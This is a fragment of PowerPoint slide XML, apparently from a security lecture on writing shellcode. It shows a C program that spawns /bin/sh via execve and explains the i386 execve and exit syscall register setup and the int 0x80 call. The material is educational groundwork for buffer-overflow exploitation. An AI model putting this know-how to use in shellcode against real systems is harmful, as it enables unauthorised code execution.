                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   name[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   name[1] =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(name[0], name, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>System calls in assembly are invoked by saving parameters either on the stack or in registers and then calling the software interrupt (0x80 in Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13098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45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4531">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3453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3453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3453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34531">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34531">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3453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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (char* filename, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[], </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value 0xb in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (index in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the program name in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”, NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (e.g., NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> 0x80 (note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> is the more optimized way to invoke system calls)   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36821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8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8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86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86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86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386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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> status)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Exit code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207313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8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8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86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86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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539655" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the null-terminated string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory (filename parameter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory followed by a NULL pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have the address of a NULL long word somewhere in memory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209437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96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96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96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6" name="Rectangle 4"/>
          <p:cNvSpPr>
